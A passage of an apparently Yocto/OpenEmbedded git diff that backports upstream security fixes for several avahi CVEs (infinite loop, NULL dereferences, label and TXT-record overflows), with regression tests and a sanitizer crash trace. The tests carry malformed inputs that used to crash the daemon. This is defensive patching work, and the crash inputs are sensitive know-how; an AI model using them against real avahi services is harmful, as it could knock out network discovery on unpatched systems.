+	# build$ ln ../git/README ../foo
+	# build$ ../git/scripts/setlocalversion ../git
+	# ""-dirty
+	# (i.e. creating a hardlink dirties the index)
+	cd ${S}; git diff; cd ${B}
+
 	oe_runmake -C ${S} sandbox_defconfig O=${B}
 
 	# Disable CONFIG_CMD_LICENSE, license.h is not used by tools and
diff --git a/meta/recipes-bsp/v86d/v86d_0.1.10.bb b/meta/recipes-bsp/v86d/v86d_0.1.10.bb
index a8df80fdd6..e614de0c48 100644
--- a/meta/recipes-bsp/v86d/v86d_0.1.10.bb
+++ b/meta/recipes-bsp/v86d/v86d_0.1.10.bb
@@ -1,5 +1,6 @@
 SUMMARY = "User support binary for the uvesafb kernel module"
 HOMEPAGE = "https://tracker.debian.org/pkg/v86d"
+DESCRIPTION = "v86d provides a backend for kernel drivers that need to execute x86 BIOS code. The code is executed in a controlled environment and the results are passed back to the kernel via the netlink interface."
 
 # the copyright info is at the bottom of README, expect break
 LICENSE = "GPLv2"
diff --git a/meta/recipes-connectivity/avahi/avahi.inc b/meta/recipes-connectivity/avahi/avahi.inc
index 6acedb5412..e1dfc7a861 100644
--- a/meta/recipes-connectivity/avahi/avahi.inc
+++ b/meta/recipes-connectivity/avahi/avahi.inc
@@ -21,6 +21,16 @@ LIC_FILES_CHKSUM = "file://LICENSE;md5=2d5025d4aa3495befef8f17206a5b0a1 \
 
 SRC_URI = "https://github.com/lathiat/avahi/releases/download/v${PV}/avahi-${PV}.tar.gz \
            file://fix-CVE-2017-6519.patch \
+           file://CVE-2021-3468.patch \
+           file://CVE-2023-1981.patch \
+           file://CVE-2023-38469-1.patch \
+           file://CVE-2023-38469-2.patch \
+           file://CVE-2023-38470-1.patch \
+           file://CVE-2023-38470-2.patch \
+           file://CVE-2023-38471-1.patch \
+           file://CVE-2023-38471-2.patch \
+           file://CVE-2023-38472.patch \
+           file://CVE-2023-38473.patch \
            "
 
 UPSTREAM_CHECK_URI = "https://github.com/lathiat/avahi/releases/"
diff --git a/meta/recipes-connectivity/avahi/avahi_0.7.bb b/meta/recipes-connectivity/avahi/avahi_0.7.bb
index f6e3afb24e..0df44bffbe 100644
--- a/meta/recipes-connectivity/avahi/avahi_0.7.bb
+++ b/meta/recipes-connectivity/avahi/avahi_0.7.bb
@@ -8,6 +8,9 @@ SRC_URI += "file://00avahi-autoipd \
 
 inherit update-rc.d systemd useradd
 
+# Issue only affects Debian/SUSE, not us
+CVE_CHECK_WHITELIST += "CVE-2021-26720"
+
 PACKAGES =+ "libavahi-gobject avahi-daemon libavahi-common libavahi-core libavahi-client avahi-dnsconfd libavahi-glib avahi-autoipd avahi-utils"
 
 LICENSE_libavahi-gobject = "LGPLv2.1+"
diff --git a/meta/recipes-connectivity/avahi/files/CVE-2021-3468.patch b/meta/recipes-connectivity/avahi/files/CVE-2021-3468.patch
new file mode 100644
index 0000000000..638a1f6071
--- /dev/null
+++ b/meta/recipes-connectivity/avahi/files/CVE-2021-3468.patch
@@ -0,0 +1,42 @@
+From 447affe29991ee99c6b9732fc5f2c1048a611d3b Mon Sep 17 00:00:00 2001
+From: Riccardo Schirone <sirmy15@gmail.com>
+Date: Fri, 26 Mar 2021 11:50:24 +0100
+Subject: [PATCH] Avoid infinite-loop in avahi-daemon by handling HUP event in
+ client_work
+
+If a client fills the input buffer, client_work() disables the
+AVAHI_WATCH_IN event, thus preventing the function from executing the
+`read` syscall the next times it is called. However, if the client then
+terminates the connection, the socket file descriptor receives a HUP
+event, which is not handled, thus the kernel keeps marking the HUP event
+as occurring. While iterating over the file descriptors that triggered
+an event, the client file descriptor will keep having the HUP event and
+the client_work() function is always called with AVAHI_WATCH_HUP but
+without nothing being done, thus entering an infinite loop.
+
+See https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=984938
+
+Upstream-Status: Backport
+CVE: CVE-2021-3468
+Signed-off-by: Steve Sakoman <steve@sakoman.com>
+
+---
+ avahi-daemon/simple-protocol.c | 5 +++++
+ 1 file changed, 5 insertions(+)
+
+diff --git a/avahi-daemon/simple-protocol.c b/avahi-daemon/simple-protocol.c
+index 3e0ebb11..6c0274d6 100644
+--- a/avahi-daemon/simple-protocol.c
++++ b/avahi-daemon/simple-protocol.c
+@@ -424,6 +424,11 @@ static void client_work(AvahiWatch *watch, AVAHI_GCC_UNUSED int fd, AvahiWatchEv
+         }
+     }
+ 
++    if (events & AVAHI_WATCH_HUP) {
++        client_free(c);
++        return;
++    }
++
+     c->server->poll_api->watch_update(
+         watch,
+         (c->outbuf_length > 0 ? AVAHI_WATCH_OUT : 0) |
diff --git a/meta/recipes-connectivity/avahi/files/CVE-2023-1981.patch b/meta/recipes-connectivity/avahi/files/CVE-2023-1981.patch
new file mode 100644
index 0000000000..1209864402
--- /dev/null
+++ b/meta/recipes-connectivity/avahi/files/CVE-2023-1981.patch
@@ -0,0 +1,60 @@
+Backport of:
+
+From a2696da2f2c50ac43b6c4903f72290d5c3fa9f6f Mon Sep 17 00:00:00 2001
+From: =?UTF-8?q?Petr=20Men=C5=A1=C3=ADk?= <pemensik@redhat.com>
+Date: Thu, 17 Nov 2022 01:51:53 +0100
+Subject: [PATCH] Emit error if requested service is not found
+
+It currently just crashes instead of replying with error. Check return
+value and emit error instead of passing NULL pointer to reply.
+
+Fixes #375
+
+Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/avahi/tree/debian/patches/CVE-2023-1981.patch?h=ubuntu/focal-security
+Upstream commit https://github.com/lathiat/avahi/commit/a2696da2f2c50ac43b6c4903f72290d5c3fa9f6f]
+CVE: CVE-2023-1981
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ avahi-daemon/dbus-protocol.c | 20 ++++++++++++++------
+ 1 file changed, 14 insertions(+), 6 deletions(-)
+
+--- a/avahi-daemon/dbus-protocol.c
++++ b/avahi-daemon/dbus-protocol.c
+@@ -391,10 +391,14 @@ static DBusHandlerResult msg_server_impl
+         }
+ 
+         t = avahi_alternative_host_name(n);
+-        avahi_dbus_respond_string(c, m, t);
+-        avahi_free(t);
+-
+-        return DBUS_HANDLER_RESULT_HANDLED;
++        if (t) {
++            avahi_dbus_respond_string(c, m, t);
++            avahi_free(t);
++
++            return DBUS_HANDLER_RESULT_HANDLED;
++        } else {
++            return avahi_dbus_respond_error(c, m, AVAHI_ERR_NOT_FOUND, "Hostname not found");
++        }
+ 
+     } else if (dbus_message_is_method_call(m, AVAHI_DBUS_INTERFACE_SERVER, "GetAlternativeServiceName")) {
+         char *n, *t;
+@@ -405,10 +409,14 @@ static DBusHandlerResult msg_server_impl
+         }
+ 
+         t = avahi_alternative_service_name(n);
+-        avahi_dbus_respond_string(c, m, t);
+-        avahi_free(t);
+-
+-        return DBUS_HANDLER_RESULT_HANDLED;
++        if (t) {
++            avahi_dbus_respond_string(c, m, t);
++            avahi_free(t);
++
++            return DBUS_HANDLER_RESULT_HANDLED;
++        } else {
++            return avahi_dbus_respond_error(c, m, AVAHI_ERR_NOT_FOUND, "Service not found");
++        }
+ 
+     } else if (dbus_message_is_method_call(m, AVAHI_DBUS_INTERFACE_SERVER, "EntryGroupNew")) {
+         Client *client;
diff --git a/meta/recipes-connectivity/avahi/files/CVE-2023-38469-1.patch b/meta/recipes-connectivity/avahi/files/CVE-2023-38469-1.patch
new file mode 100644
index 0000000000..12dad9ef6f
--- /dev/null
+++ b/meta/recipes-connectivity/avahi/files/CVE-2023-38469-1.patch
@@ -0,0 +1,48 @@
+From a337a1ba7d15853fb56deef1f464529af6e3a1cf Mon Sep 17 00:00:00 2001
+From: Evgeny Vereshchagin <evvers@ya.ru>
+Date: Mon, 23 Oct 2023 20:29:31 +0000
+Subject: [PATCH] core: reject overly long TXT resource records
+
+Closes https://github.com/lathiat/avahi/issues/455
+
+CVE-2023-38469
+
+Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/avahi/tree/debian/patches/CVE-2023-38469-1.patch?h=ubuntu/focal-security
+Upstream commit https://github.com/lathiat/avahi/commit/a337a1ba7d15853fb56deef1f464529af6e3a1cf]
+CVE: CVE-2023-38469
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ avahi-core/rr.c | 9 ++++++++-
+ 1 file changed, 8 insertions(+), 1 deletion(-)
+
+Index: avahi-0.7/avahi-core/rr.c
+===================================================================
+--- avahi-0.7.orig/avahi-core/rr.c
++++ avahi-0.7/avahi-core/rr.c
+@@ -32,6 +32,7 @@
+ #include <avahi-common/malloc.h>
+ #include <avahi-common/defs.h>
+ 
++#include "dns.h"
+ #include "rr.h"
+ #include "log.h"
+ #include "util.h"
+@@ -688,11 +689,17 @@ int avahi_record_is_valid(AvahiRecord *r
+         case AVAHI_DNS_TYPE_TXT: {
+ 
+             AvahiStringList *strlst;
++            size_t used = 0;
+ 
+-            for (strlst = r->data.txt.string_list; strlst; strlst = strlst->next)
++            for (strlst = r->data.txt.string_list; strlst; strlst = strlst->next) {
+                 if (strlst->size > 255 || strlst->size <= 0)
+                     return 0;
+ 
++                used += 1+strlst->size;
++                if (used > AVAHI_DNS_RDATA_MAX)
++                    return 0;
++            }
++
+             return 1;
+         }
+     }
diff --git a/meta/recipes-connectivity/avahi/files/CVE-2023-38469-2.patch b/meta/recipes-connectivity/avahi/files/CVE-2023-38469-2.patch
new file mode 100644
index 0000000000..a62c718ebe
--- /dev/null
+++ b/meta/recipes-connectivity/avahi/files/CVE-2023-38469-2.patch
@@ -0,0 +1,65 @@
+From c6cab87df290448a63323c8ca759baa516166237 Mon Sep 17 00:00:00 2001
+From: Evgeny Vereshchagin <evvers@ya.ru>
+Date: Wed, 25 Oct 2023 18:15:42 +0000
+Subject: [PATCH] tests: pass overly long TXT resource records
+
+to make sure they don't crash avahi any more.
+It reproduces https://github.com/lathiat/avahi/issues/455
+
+Canonical notes:
+nickgalanis> removed first hunk since there is no .github dir in this release
+
+Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/avahi/tree/debian/patches/CVE-2023-38469-2.patch?h=ubuntu/focal-security
+Upstream commit https://github.com/lathiat/avahi/commit/c6cab87df290448a63323c8ca759baa516166237]
+CVE: CVE-2023-38469
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ avahi-client/client-test.c       | 14 ++++++++++++++
+ 1 files changed, 14 insertions(+)
+
+Index: avahi-0.7/avahi-client/client-test.c
+===================================================================
+--- avahi-0.7.orig/avahi-client/client-test.c
++++ avahi-0.7/avahi-client/client-test.c
+@@ -22,6 +22,7 @@
+ #endif
+ 
+ #include <stdio.h>
++#include <string.h>
+ #include <assert.h>
+ 
+ #include <avahi-client/client.h>
+@@ -33,6 +34,8 @@
+ #include <avahi-common/malloc.h>
+ #include <avahi-common/timeval.h>
+ 
++#include <avahi-core/dns.h>
++
+ static const AvahiPoll *poll_api = NULL;
+ static AvahiSimplePoll *simple_poll = NULL;
+ 
+@@ -222,6 +225,9 @@ int main (AVAHI_GCC_UNUSED int argc, AVA
+     uint32_t cookie;
+     struct timeval tv;
+     AvahiAddress a;
++    uint8_t rdata[AVAHI_DNS_RDATA_MAX+1];
++    AvahiStringList *txt = NULL;
++    int r;
+ 
+     simple_poll = avahi_simple_poll_new();
+     poll_api = avahi_simple_poll_get(simple_poll);
+@@ -258,6 +264,14 @@ int main (AVAHI_GCC_UNUSED int argc, AVA
+     printf("%s\n", avahi_strerror(avahi_entry_group_add_service (group, AVAHI_IF_UNSPEC, AVAHI_PROTO_UNSPEC, 0, "Lathiat's Site", "_http._tcp", NULL, NULL, 80, "foo=bar", NULL)));
+     printf("add_record: %d\n", avahi_entry_group_add_record (group, AVAHI_IF_UNSPEC, AVAHI_PROTO_UNSPEC, 0, "TestX", 0x01, 0x10, 120, "\5booya", 6));
+ 
++    memset(rdata, 1, sizeof(rdata));
++    r = avahi_string_list_parse(rdata, sizeof(rdata), &txt);
++    assert(r >= 0);
++    assert(avahi_string_list_serialize(txt, NULL, 0) == sizeof(rdata));
++    error = avahi_entry_group_add_service_strlst(group, AVAHI_IF_UNSPEC, AVAHI_PROTO_UNSPEC, 0, "TestX", "_qotd._tcp", NULL, NULL, 123, txt);
++    assert(error == AVAHI_ERR_INVALID_RECORD);
++    avahi_string_list_free(txt);
++
+     avahi_entry_group_commit (group);
+ 
+     domain = avahi_domain_browser_new (avahi, AVAHI_IF_UNSPEC, AVAHI_PROTO_UNSPEC, NULL, AVAHI_DOMAIN_BROWSER_BROWSE, 0, avahi_domain_browser_callback, (char*) "omghai3u");
diff --git a/meta/recipes-connectivity/avahi/files/CVE-2023-38470-1.patch b/meta/recipes-connectivity/avahi/files/CVE-2023-38470-1.patch
new file mode 100644
index 0000000000..82fb1ab40b
--- /dev/null
+++ b/meta/recipes-connectivity/avahi/files/CVE-2023-38470-1.patch
@@ -0,0 +1,57 @@
+From 94cb6489114636940ac683515417990b55b5d66c Mon Sep 17 00:00:00 2001
+From: =?UTF-8?q?Petr=20Men=C5=A1=C3=ADk?= <pemensik@redhat.com>
+Date: Tue, 11 Apr 2023 15:29:59 +0200
+Subject: [PATCH] Ensure each label is at least one byte long
+
+The only allowed exception is single dot, where it should return empty
+string.
+
+Fixes #454.
+
+Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/avahi/tree/debian/patches/CVE-2023-38470-1.patch?h=ubuntu/focal-security
+Upstream commit https://github.com/lathiat/avahi/commit/94cb6489114636940ac683515417990b55b5d66c]
+CVE: CVE-2023-38470
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ avahi-common/domain-test.c | 14 ++++++++++++++
+ avahi-common/domain.c      |  2 +-
+ 2 files changed, 15 insertions(+), 1 deletion(-)
+
+Index: avahi-0.7/avahi-common/domain-test.c
+===================================================================
+--- avahi-0.7.orig/avahi-common/domain-test.c
++++ avahi-0.7/avahi-common/domain-test.c
+@@ -45,6 +45,20 @@ int main(AVAHI_GCC_UNUSED int argc, AVAH
+     printf("%s\n", s = avahi_normalize_name_strdup("fo\\\\o\\..f oo."));
+     avahi_free(s);
+ 
++    printf("%s\n", s = avahi_normalize_name_strdup("."));
++    avahi_free(s);
++
++    s = avahi_normalize_name_strdup(",.=.}.=.?-.}.=.?.?.}.}.?.?.?.z.?.?.}.}."
++		    "}.?.?.?.r.=.=.}.=.?.}}.}.?.?.?.zM.=.=.?.?.}.}.?.?.}.}.}"
++		    ".?.?.?.r.=.=.}.=.?.}}.}.?.?.?.zM.=.=.?.?.}.}.?.?.?.zM.?`"
++		    "?.}.}.}.?.?.?.r.=.?.}.=.?.?.}.?.?.?.}.=.?.?.}??.}.}.?.?."
++		    "?.z.?.?.}.}.}.?.?.?.r.=.=.}.=.?.}}.}.?.?.?.zM.?`?.}.}.}."
++		    "??.?.zM.?`?.}.}.}.?.?.?.r.=.?.}.=.?.?.}.?.?.?.}.=.?.?.}?"
++		    "?.}.}.?.?.?.z.?.?.}.}.}.?.?.?.r.=.=.}.=.?.}}.}.?.?.?.zM."
++		    "?`?.}.}.}.?.?.?.r.=.=.?.?`.?.?}.}.}.?.?.?.r.=.?.}.=.?.?."
++		    "}.?.?.?.}.=.?.?.}");
++    assert(s == NULL);
++
+     printf("%i\n", avahi_domain_equal("\\065aa bbb\\.\\046cc.cc\\\\.dee.fff.", "Aaa BBB\\.\\.cc.cc\\\\.dee.fff"));
+     printf("%i\n", avahi_domain_equal("A", "a"));
+ 
+Index: avahi-0.7/avahi-common/domain.c
+===================================================================
+--- avahi-0.7.orig/avahi-common/domain.c
++++ avahi-0.7/avahi-common/domain.c
+@@ -201,7 +201,7 @@ char *avahi_normalize_name(const char *s
+         }
+ 
+         if (!empty) {
+-            if (size < 1)
++            if (size < 2)
+                 return NULL;
+ 
+             *(r++) = '.';
diff --git a/meta/recipes-connectivity/avahi/files/CVE-2023-38470-2.patch b/meta/recipes-connectivity/avahi/files/CVE-2023-38470-2.patch
new file mode 100644
index 0000000000..403ed6fd6a
--- /dev/null
+++ b/meta/recipes-connectivity/avahi/files/CVE-2023-38470-2.patch
@@ -0,0 +1,53 @@
+From 20dec84b2480821704258bc908e7b2bd2e883b24 Mon Sep 17 00:00:00 2001
+From: Evgeny Vereshchagin <evvers@ya.ru>
+Date: Tue, 19 Sep 2023 03:21:25 +0000
+Subject: [PATCH] [common] bail out when escaped labels can't fit into ret
+
+Fixes:
+```
+==93410==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7f9e76f14c16 at pc 0x00000047208d bp 0x7ffee90a6a00 sp 0x7ffee90a61c8
+READ of size 1110 at 0x7f9e76f14c16 thread T0
+    #0 0x47208c in __interceptor_strlen (out/fuzz-domain+0x47208c) (BuildId: 731b20c1eef22c2104e75a6496a399b10cfc7cba)
+    #1 0x534eb0 in avahi_strdup avahi/avahi-common/malloc.c:167:12
+    #2 0x53862c in avahi_normalize_name_strdup avahi/avahi-common/domain.c:226:12
+```
+and
+```
+fuzz-domain: fuzz/fuzz-domain.c:38: int LLVMFuzzerTestOneInput(const uint8_t *, size_t): Assertion `avahi_domain_equal(s, t)' failed.
+==101571== ERROR: libFuzzer: deadly signal
+    #0 0x501175 in __sanitizer_print_stack_trace (/home/vagrant/avahi/out/fuzz-domain+0x501175) (BuildId: 682bf6400aff9d41b64b6e2cc3ef5ad600216ea8)
+    #1 0x45ad2c in fuzzer::PrintStackTrace() (/home/vagrant/avahi/out/fuzz-domain+0x45ad2c) (BuildId: 682bf6400aff9d41b64b6e2cc3ef5ad600216ea8)
+    #2 0x43fc07 in fuzzer::Fuzzer::CrashCallback() (/home/vagrant/avahi/out/fuzz-domain+0x43fc07) (BuildId: 682bf6400aff9d41b64b6e2cc3ef5ad600216ea8)
+    #3 0x7f1581d7ebaf  (/lib64/libc.so.6+0x3dbaf) (BuildId: c9f62793b9e886eb1b95077d4f26fe2b4aa1ac25)
+    #4 0x7f1581dcf883 in __pthread_kill_implementation (/lib64/libc.so.6+0x8e883) (BuildId: c9f62793b9e886eb1b95077d4f26fe2b4aa1ac25)
+    #5 0x7f1581d7eafd in gsignal (/lib64/libc.so.6+0x3dafd) (BuildId: c9f62793b9e886eb1b95077d4f26fe2b4aa1ac25)
+    #6 0x7f1581d6787e in abort (/lib64/libc.so.6+0x2687e) (BuildId: c9f62793b9e886eb1b95077d4f26fe2b4aa1ac25)
+    #7 0x7f1581d6779a in __assert_fail_base.cold (/lib64/libc.so.6+0x2679a) (BuildId: c9f62793b9e886eb1b95077d4f26fe2b4aa1ac25)
+    #8 0x7f1581d77186 in __assert_fail (/lib64/libc.so.6+0x36186) (BuildId: c9f62793b9e886eb1b95077d4f26fe2b4aa1ac25)
+    #9 0x5344a4 in LLVMFuzzerTestOneInput /home/vagrant/avahi/fuzz/fuzz-domain.c:38:9
+```
+
+It's a follow-up to 94cb6489114636940ac683515417990b55b5d66c
+
+Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/avahi/tree/debian/patches/CVE-2023-38471-2.patch?h=ubuntu/focal-security
+Upstream commit https://github.com/lathiat/avahi/commit/20dec84b2480821704258bc908e7b2bd2e883b24]
+CVE: CVE-2023-38470 #Follow-up patch
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ avahi-common/domain.c | 3 ++-
+ 1 file changed, 2 insertions(+), 1 deletion(-)
+
+Index: avahi-0.7/avahi-common/domain.c
+===================================================================
+--- avahi-0.7.orig/avahi-common/domain.c
++++ avahi-0.7/avahi-common/domain.c
+@@ -210,7 +210,8 @@ char *avahi_normalize_name(const char *s
+         } else
+             empty = 0;
+ 
+-        avahi_escape_label(label, strlen(label), &r, &size);
++        if (!(avahi_escape_label(label, strlen(label), &r, &size)))
++            return NULL;
+     }
+ 
+     return ret_s;
diff --git a/meta/recipes-connectivity/avahi/files/CVE-2023-38471-1.patch b/meta/recipes-connectivity/avahi/files/CVE-2023-38471-1.patch
new file mode 100644
index 0000000000..c8d6a66174
--- /dev/null
+++ b/meta/recipes-connectivity/avahi/files/CVE-2023-38471-1.patch
@@ -0,0 +1,73 @@
+From 894f085f402e023a98cbb6f5a3d117bd88d93b09 Mon Sep 17 00:00:00 2001
+From: Michal Sekletar <msekleta@redhat.com>
+Date: Mon, 23 Oct 2023 13:38:35 +0200
+Subject: [PATCH] core: extract host name using avahi_unescape_label()
+
+Previously we could create invalid escape sequence when we split the
+string on dot. For example, from valid host name "foo\\.bar" we have
+created invalid name "foo\\" and tried to set that as the host name
+which crashed the daemon.
+
+Fixes #453
+
+CVE-2023-38471
+
+Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/avahi/tree/debian/patches/CVE-2023-38471-1.patch?h=ubuntu/focal-security
+Upstream commit https://github.com/lathiat/avahi/commit/894f085f402e023a98cbb6f5a3d117bd88d93b09]
+CVE: CVE-2023-38471
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ avahi-core/server.c | 27 +++++++++++++++++++++------
+ 1 file changed, 21 insertions(+), 6 deletions(-)
+
+Index: avahi-0.7/avahi-core/server.c
+===================================================================
+--- avahi-0.7.orig/avahi-core/server.c
++++ avahi-0.7/avahi-core/server.c
+@@ -1253,7 +1253,11 @@ static void update_fqdn(AvahiServer *s)
+ }
+ 
+ int avahi_server_set_host_name(AvahiServer *s, const char *host_name) {
+-    char *hn = NULL;
++    char label_escaped[AVAHI_LABEL_MAX*4+1];
++    char label[AVAHI_LABEL_MAX];
++    char *hn = NULL, *h;
++    size_t len;
++
+     assert(s);
+ 
+     AVAHI_CHECK_VALIDITY(s, !host_name || avahi_is_valid_host_name(host_name), AVAHI_ERR_INVALID_HOST_NAME);
+@@ -1263,17 +1267,28 @@ int avahi_server_set_host_name(AvahiServ
+     else
+         hn = avahi_normalize_name_strdup(host_name);
+ 
+-    hn[strcspn(hn, ".")] = 0;
++    h = hn;
++    if (!avahi_unescape_label((const char **)&hn, label, sizeof(label))) {
++        avahi_free(h);
++        return AVAHI_ERR_INVALID_HOST_NAME;
++    }
++
++    avahi_free(h);
+ 
+-    if (avahi_domain_equal(s->host_name, hn) && s->state != AVAHI_SERVER_COLLISION) {
+-        avahi_free(hn);
++    h = label_escaped;
++    len = sizeof(label_escaped);
++    if (!avahi_escape_label(label, strlen(label), &h, &len))
++        return AVAHI_ERR_INVALID_HOST_NAME;
++
++    if (avahi_domain_equal(s->host_name, label_escaped) && s->state != AVAHI_SERVER_COLLISION)
+         return avahi_server_set_errno(s, AVAHI_ERR_NO_CHANGE);
+-    }
+ 
+     withdraw_host_rrs(s);
+ 
+     avahi_free(s->host_name);
+-    s->host_name = hn;
++    s->host_name = avahi_strdup(label_escaped);
++    if (!s->host_name)
++        return AVAHI_ERR_NO_MEMORY;
+ 
+     update_fqdn(s);
+ 
diff --git a/meta/recipes-connectivity/avahi/files/CVE-2023-38471-2.patch b/meta/recipes-connectivity/avahi/files/CVE-2023-38471-2.patch
new file mode 100644
index 0000000000..a789b144ed
--- /dev/null
+++ b/meta/recipes-connectivity/avahi/files/CVE-2023-38471-2.patch
@@ -0,0 +1,52 @@
+From b675f70739f404342f7f78635d6e2dcd85a13460 Mon Sep 17 00:00:00 2001
+From: Evgeny Vereshchagin <evvers@ya.ru>
+Date: Tue, 24 Oct 2023 22:04:51 +0000
+Subject: [PATCH] core: return errors from avahi_server_set_host_name properly
+
+It's a follow-up to 894f085f402e023a98cbb6f5a3d117bd88d93b09
+
+Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/avahi/tree/debian/patches/CVE-2023-38471-2.patch?h=ubuntu/focal-security
+Upstream commit https://github.com/lathiat/avahi/commit/b675f70739f404342f7f78635d6e2dcd85a13460]
+CVE: CVE-2023-38471 #Follow-up Patch
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ avahi-core/server.c | 9 ++++++---
+ 1 file changed, 6 insertions(+), 3 deletions(-)
+
+Index: avahi-0.7/avahi-core/server.c
+===================================================================
+--- avahi-0.7.orig/avahi-core/server.c
++++ avahi-0.7/avahi-core/server.c
+@@ -1267,10 +1267,13 @@ int avahi_server_set_host_name(AvahiServ
+     else
+         hn = avahi_normalize_name_strdup(host_name);
+ 
++    if (!hn)
++        return avahi_server_set_errno(s, AVAHI_ERR_NO_MEMORY);
++
+     h = hn;
+     if (!avahi_unescape_label((const char **)&hn, label, sizeof(label))) {
+         avahi_free(h);
+-        return AVAHI_ERR_INVALID_HOST_NAME;
++        return avahi_server_set_errno(s, AVAHI_ERR_INVALID_HOST_NAME);
+     }
+ 
+     avahi_free(h);
+@@ -1278,7 +1281,7 @@ int avahi_server_set_host_name(AvahiServ
+     h = label_escaped;
+     len = sizeof(label_escaped);
+     if (!avahi_escape_label(label, strlen(label), &h, &len))
+-        return AVAHI_ERR_INVALID_HOST_NAME;
++        return avahi_server_set_errno(s, AVAHI_ERR_INVALID_HOST_NAME);
+ 
+     if (avahi_domain_equal(s->host_name, label_escaped) && s->state != AVAHI_SERVER_COLLISION)
+         return avahi_server_set_errno(s, AVAHI_ERR_NO_CHANGE);
+@@ -1288,7 +1291,7 @@ int avahi_server_set_host_name(AvahiServ
+     avahi_free(s->host_name);
+     s->host_name = avahi_strdup(label_escaped);
+     if (!s->host_name)
+-        return AVAHI_ERR_NO_MEMORY;
++        return avahi_server_set_errno(s, AVAHI_ERR_NO_MEMORY);
+ 
+     update_fqdn(s);
+ 
diff --git a/meta/recipes-connectivity/avahi/files/CVE-2023-38472.patch b/meta/recipes-connectivity/avahi/files/CVE-2023-38472.patch
new file mode 100644
index 0000000000..f49d990a42
--- /dev/null
+++ b/meta/recipes-connectivity/avahi/files/CVE-2023-38472.patch
@@ -0,0 +1,45 @@
+From b024ae5749f4aeba03478e6391687c3c9c8dee40 Mon Sep 17 00:00:00 2001
+From: Michal Sekletar <msekleta@redhat.com>
+Date: Thu, 19 Oct 2023 17:36:44 +0200
+Subject: [PATCH] core: make sure there is rdata to process before parsing it
+
+Fixes #452
+
+CVE-2023-38472
+
+Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/avahi/tree/debian/patches/CVE-2023-38472.patch?h=ubuntu/focal-security
+Upstream commit https://github.com/lathiat/avahi/commit/b024ae5749f4aeba03478e6391687c3c9c8dee40]
+CVE: CVE-2023-38472
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ avahi-client/client-test.c      | 3 +++
+ avahi-daemon/dbus-entry-group.c | 2 +-
+ 2 files changed, 4 insertions(+), 1 deletion(-)
+
+Index: avahi-0.7/avahi-client/client-test.c
+===================================================================
+--- avahi-0.7.orig/avahi-client/client-test.c
++++ avahi-0.7/avahi-client/client-test.c
+@@ -272,6 +272,9 @@ int main (AVAHI_GCC_UNUSED int argc, AVA
+     assert(error == AVAHI_ERR_INVALID_RECORD);
+     avahi_string_list_free(txt);
+ 
++    error = avahi_entry_group_add_record (group, AVAHI_IF_UNSPEC, AVAHI_PROTO_UNSPEC, 0, "TestX", 0x01, 0x10, 120, "", 0);
++    assert(error != AVAHI_OK);
++
+     avahi_entry_group_commit (group);
+ 
+     domain = avahi_domain_browser_new (avahi, AVAHI_IF_UNSPEC, AVAHI_PROTO_UNSPEC, NULL, AVAHI_DOMAIN_BROWSER_BROWSE, 0, avahi_domain_browser_callback, (char*) "omghai3u");
+Index: avahi-0.7/avahi-daemon/dbus-entry-group.c
+===================================================================
+--- avahi-0.7.orig/avahi-daemon/dbus-entry-group.c
++++ avahi-0.7/avahi-daemon/dbus-entry-group.c
+@@ -340,7 +340,7 @@ DBusHandlerResult avahi_dbus_msg_entry_g
+         if (!(r = avahi_record_new_full (name, clazz, type, ttl)))
+             return avahi_dbus_respond_error(c, m, AVAHI_ERR_NO_MEMORY, NULL);
+ 
+-        if (avahi_rdata_parse (r, rdata, size) < 0) {
++        if (!rdata || avahi_rdata_parse (r, rdata, size) < 0) {
+             avahi_record_unref (r);
+             return avahi_dbus_respond_error(c, m, AVAHI_ERR_INVALID_RDATA, NULL);
+         }
diff --git a/meta/recipes-connectivity/avahi/files/CVE-2023-38473.patch b/meta/recipes-connectivity/avahi/files/CVE-2023-38473.patch
new file mode 100644
index 0000000000..59f6806c85
--- /dev/null
+++ b/meta/recipes-connectivity/avahi/files/CVE-2023-38473.patch
@@ -0,0 +1,109 @@
+From b448c9f771bada14ae8de175695a9729f8646797 Mon Sep 17 00:00:00 2001
+From: Michal Sekletar <msekleta@redhat.com>
+Date: Wed, 11 Oct 2023 17:45:44 +0200
+Subject: [PATCH] common: derive alternative host name from its unescaped
+ version
+
+Normalization of input makes sure we don't have to deal with special
+cases like unescaped dot at the end of label.
+
+Fixes #451 #487
+CVE-2023-38473
+
+Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/avahi/tree/debian/patches/CVE-2023-38473.patch?h=ubuntu/focal-security
+Upstream commit https://github.com/lathiat/avahi/commit/b448c9f771bada14ae8de175695a9729f8646797]
+CVE: CVE-2023-38473
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ avahi-common/alternative-test.c |  3 +++
+ avahi-common/alternative.c      | 27 +++++++++++++++++++--------
+ 2 files changed, 22 insertions(+), 8 deletions(-)
+
+Index: avahi-0.7/avahi-common/alternative-test.c
+===================================================================
+--- avahi-0.7.orig/avahi-common/alternative-test.c
++++ avahi-0.7/avahi-common/alternative-test.c
+@@ -31,6 +31,9 @@ int main(AVAHI_GCC_UNUSED int argc, AVAH
+     const char* const test_strings[] = {
+         "XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX",
+         "XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXüüüüüüü",
++        ").",
++        "\\.",
